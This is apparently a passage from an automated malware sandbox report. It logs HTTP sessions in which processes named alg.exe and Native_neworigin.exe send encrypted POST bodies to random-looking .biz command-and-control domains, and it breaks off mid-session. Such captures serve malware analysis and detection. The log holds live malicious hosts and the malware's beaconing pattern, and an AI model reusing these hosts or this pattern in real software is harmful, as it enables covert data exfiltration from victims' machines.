                                                                                                                                                                                                                                                                                                                                                                                                                                      17192.168.2.74996282.112.184.197805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.972387075 CET355OUTPOST /ceginiuaduqvi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.972403049 CET778OUTData Raw: e9 00 f9 ff 0a c3 7d 50 fe 02 00 00 e6 dc a3 1a 08 d8 ed a5 98 21 74 29 ec 4b d6 66 d2 90 a2 7c bb 6c ca ec 4b 80 18 a0 53 98 b6 2a 0b 24 de ef 5c f4 9a 85 3e 0d 35 43 ed 9f 4f 22 ef ea 0d 13 63 29 4b 80 be 1f 59 f2 42 3c 1a b8 df 70 af 49 49 32
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: }P!t)Kf|lKS*$\>5CO"c)KYB<pII2\/jd9vKvD"OR74n/w@;ehZzxr=K?g0Oc|s^E=h6q|}-])$n<u`Ysox]Oq7(


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      18192.168.2.74997682.112.184.197802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.371336937 CET349OUTPOST /csle HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.371382952 CET844OUTData Raw: d3 9d 1e 6f b0 41 be 28 40 03 00 00 5c a9 ad a4 28 d3 ef c0 d2 02 61 4a f2 f6 26 94 ba 0c f3 50 81 68 79 42 d8 78 05 aa 10 ed 4a 58 56 b1 31 b5 17 cb cb bc d2 92 86 99 90 8a 01 e5 a6 f9 a3 a5 15 9d 41 af 9c ed fd c5 49 2a 34 cd f5 e4 e1 83 95 84
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: oA(@\(aJ&PhyBxJXV1AI*4dL>p,-149i[o9[VWSuYVLGdpfg{rok$V<F@(^=4zsv)w_8\&w"6G


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      19192.168.2.74999482.112.184.197805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:12.932389021 CET354OUTPOST /yqjfubvmytgo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:12.932430983 CET778OUTData Raw: 97 53 93 69 5b 99 51 c2 fe 02 00 00 eb 80 64 73 cf 95 f6 70 bb 8a 2f 9b e2 53 e0 0d 87 9e ac 8a cc e6 ba af 7e 65 9c 6c e4 09 95 cf aa 5b 4e 7e 7f 78 4b 8f 47 d9 95 9f cc 1f 69 26 b7 5e e4 72 d3 50 8e 47 b6 c4 a5 d6 21 90 2b 15 a6 19 6f 06 a9 97
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Si[Qdsp/S~el[N~xKGi&^rPG!+os-SBx:GIn8:$^`9<EEUbD0HJPa*:!#;.iJGI-aWN!5Db0iH('Sn.hScdGM


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      20192.168.2.74999554.244.188.177801260C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:20.374394894 CET353OUTPOST /gyfeenvy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:20.374438047 CET842OUTData Raw: 70 ca 61 dd 13 20 dd 29 3e 03 00 00 54 b5 51 7f 9c cb 18 94 cf 25 72 73 f1 77 9a ba a3 7d b6 74 cf 6c 57 28 3d cb 2d a4 69 55 47 dc 7e 17 34 e4 a2 b0 93 40 c1 f8 40 b9 ff c7 d9 df c2 f4 c9 7c 41 f2 ca 01 e1 47 c0 68 47 f6 c2 60 a6 3e fb 5d d1 e5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: pa )>TQ%rsw}tlW(=-iUG~4@@|AGhG`>]'moBd5owES=4"oeUn[]kf.AVb+cmMe"ke5H~1^(k3]dxAM`,)8-3h#LTJ\OfF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.194853067 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=89039665acf1ca3a81fc4344934bd7f1|155.94.241.187|1731920241|1731920241|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      21192.168.2.74999718.141.10.107801260C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.555777073 CET350OUTPOST /asrbrcv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.555798054 CET842OUTData Raw: fa 7c 84 2d 9f f6 21 7e 3e 03 00 00 58 88 c5 a1 be a2 ff 79 67 e8 17 9c 59 a7 6f c6 04 fd b9 05 04 8a 6a a4 2e af 7b b5 bd f5 24 bc 3a 15 a0 53 da 27 86 54 aa e0 1d ac 11 8c ac a4 93 44 ae ad 42 e1 b1 d0 3d 4f 14 a8 65 86 1b 2c 2f bc 16 9c 21 69
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: |-!~>XygYoj.{$:S'TDB=Oe,/!i6|LE0rY&6S+$2%0Q(i&Zt:qwhAvm/8yymo&%fH'3+ED[[2'@_F{`&uy[9FGWi1;-
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.012875080 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4869155e56cd3c80bfc06f4fe4387338|155.94.241.187|1731920242|1731920242|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      22192.168.2.74999882.112.184.197805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.654699087 CET346OUTPOST /l HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.654699087 CET778OUTData Raw: 03 9d a2 c9 a3 57 df 08 fe 02 00 00 d7 8f 78 a2 85 88 43 5c 16 c5 f1 3f a3 ba c3 50 a2 a0 7d ea 42 d7 22 42 f9 4f e0 8b cb 1f d9 1f 3f 5b ab cb 80 fb 13 c9 d0 45 0f 8f d4 38 14 50 53 30 4e f0 4c 40 ac b3 e9 fc 5e 5d 42 b2 5b 98 b5 2b ae 7d f7 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: WxC\?P}B"BO?[E8PS0NL@^]B[+}|=I:,5DG:-0eF7>3f+)\RK6QO&9lXe[?$Al)u@gg$f5yAbSuO=*QjZ(# "O~[


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      23192.168.2.74999954.244.188.177801260C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.341366053 CET352OUTPOST /doycjbriulf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.341388941 CET842OUTData Raw: 18 25 5e 88 bf 6b 1f c7 3e 03 00 00 a2 82 93 6e b8 69 d2 ed 13 ad d9 3f 4c 8e cd 4e ca 95 4c 11 84 88 68 87 6e 3c 40 33 a7 47 64 ce 68 71 06 7f 28 34 38 f9 79 a6 f5 fd 81 0b fe bf 52 92 99 03 0e 41 83 9e aa 55 e1 f9 bf 03 6e 55 9b 66 36 72 37 8e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: %^k>ni?LNLhn<@3Gdhq(48yRAUnUf6r7zj>-3O;4w:%mR:U9<+m#q,Q<e5Y"F?OS@nr+=7_aw|CB:a2KtpKXCX`#nl[&
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.198163986 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=201d8d0aca08c1ef4c33feeb70821dfd|155.94.241.187|1731920244|1731920244|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      24192.168.2.75000154.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.199368000 CET353OUTPOST /cbqytxty HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.199383974 CET842OUTData Raw: 37 e8 1b 1d f9 ae e4 b4 3e 03 00 00 63 f0 8b 2e 52 c7 54 13 cd 2b d5 55 3a df 5f f0 d0 f9 85 55 62 18 d2 5d a2 22 c7 97 fc 49 d2 c1 01 aa 40 96 3c 86 02 f8 12 26 ca 62 63 2e 2b aa 9d 55 f1 f9 a3 b3 f2 0b ca 72 82 70 b1 e1 3c b0 cf 43 5f aa 9d 68
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 7>c.RT+U:_Ub]"I@<&bc.+Urp<C_hqu,(|8b=zX=GQG%rFV'4(EF4"\O(_\KUdicp*Iv1sB[=^,0N$h)|Sk:5E~IBa.(t
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.025418997 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=6415f360d414e43a3d0fed9549f8b1df|155.94.241.187|1731920245|1731920245|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      25192.168.2.75000318.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.051033974 CET351OUTPOST /xrepjfbt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.051048040 CET842OUTData Raw: 2c d9 c6 cf 35 b2 a0 52 3e 03 00 00 a2 8a a4 27 1b 53 d1 e7 28 1f 3f 40 09 82 bc 52 48 f3 0f e6 6b e1 b3 1a aa 09 b0 f1 6b a3 4d d2 10 b6 6b b3 4f 12 88 76 a2 1f 14 65 a0 35 af af fb 8c 57 e1 49 5d fd 32 ad 18 c0 c9 48 d4 ac 4a 5b 6c 69 39 70 8c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ,5R>'S(?@RHkkMkOve5WI]2HJ[li9p[@k,2c_E'~=lAeU*:scx#XHe/a3E<pQF4q,Ij:TI@1Z7M!bP*kbpn~dBG7>:N]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.518802881 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=9cdadf0ed4d81737665493049cd8f8b0|155.94.241.187|1731920247|1731920247|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      26192.168.2.75000454.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.549246073 CET352OUTPOST /bbhgohbwpwg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.549246073 CET842OUTData Raw: 4e cb a7 ca 2a e1 a4 52 3e 03 00 00 28 3b 7f 23 0b cb 9e 0a 62 af 3d cd 81 3b 71 0c f7 ac 30 ec bd 45 ca ec a6 85 21 c9 6e b8 98 f0 66 76 5f 4f 1a 40 3f 26 fa b2 79 81 7d f3 88 b3 54 cd 8f e6 b9 9c b7 68 3b 75 e2 14 2c fc 30 35 c0 db 29 b4 87 f2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: N*R>(;#b=;q0E!nfv_O@?&y}Th;u,05)m8jw''i+A\5E8#lF:{XJ]~]O4}(qP8{#@s[ad`K-i+V87-*B*O@!Zblv7h#k1,6 <yX]lVG`Q>jt
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:28.379595995 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=6aad88018ee0663eb88994e96f05d8b2|155.94.241.187|1731920248|1731920248|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      27192.168.2.75000544.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.178601980 CET354OUTPOST /coprggngfj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.178601980 CET842OUTData Raw: 09 fb 46 6f 8a 69 69 fc 3e 03 00 00 dc 50 ae e4 29 4b 48 3f 5c a6 28 2c c0 8a 13 6d 3b 9f ab 13 f0 3c ed 69 e9 10 ee 62 ee cf f4 cb f3 b7 30 b5 e1 68 b7 28 4c 62 9d ba df a5 02 20 44 08 09 22 b5 3c fd 5e 78 d3 9e 77 76 35 9f 87 dd bc 3f 92 95 74
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Foii>P)KH?\(,m;<ib0h(Lb D"<^xwv5?tYj&X'_:WuhU}"LnK5jt|z;OAWX7"z#zM@d&:h4h/N%aIWkA6L:2.Qu`G>6[W_
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.841303110 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=f5ff51822b4716a485c599edd8527834|155.94.241.187|1731920249|1731920249|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      28192.168.2.750006172.234.222.13880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.865233898 CET359OUTPOST /noknucojhesrodhp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
